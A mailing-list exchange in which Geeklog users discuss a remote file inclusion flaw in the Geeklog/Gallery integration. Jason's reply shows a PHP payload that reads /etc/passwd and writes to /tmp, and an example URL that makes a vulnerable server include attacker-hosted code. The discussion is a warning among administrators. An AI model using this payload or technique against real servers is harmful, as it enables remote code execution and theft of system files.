Dirk Haun wrote:
Jason,
This article worries me a bit:
http://www.securityfocus.com/guest/24043
[...]
The vulerability discussed allowed me to write arbitrary data to the
server's hard disk, run all kinds of shell commands, and get the output
back in my browser. Worrying to be sure.
Hmm, I've only skimmed the article yet but my first impression was that
it a) was "only" a problem of the Geeklog/Gallery integration (not of
Geeklog itself) and b) was "only" used to send spam.
I must have missed the bit about writing to the server's hard disk, but I
don't really have the time now to look into it. Can someone confirm if
this is "only" a problem with the Gallery integration?
bye, Dirk
Hello again,
The article didn't mention writing to the server's hard disk. I was
able to do that myself after reading the article. It's not hard, once
you get the basic idea.
Essentially, this allows you to feed PHP script to a remote server,
which will then execute it. So, if your server is running Gallery &
Geeklog, I can make your server execute this:
<?
passthru('cat /etc/passwd');
passthru('echo "MY DATA HERE" > /tmp/mydataonyourdisk.file');
. . .
?>
As far as I know, this is possible anywhere someone does something like
this:
include('$VARIABLE/file.php');
A user in the know could construct a URL like
http://yoursite.com/blah.php?VARIBLE=http://mysite.com/mycode.php.
I'm not an expert by any means, so if this doesn't make sense or is
wrong, let me know.
-Jason
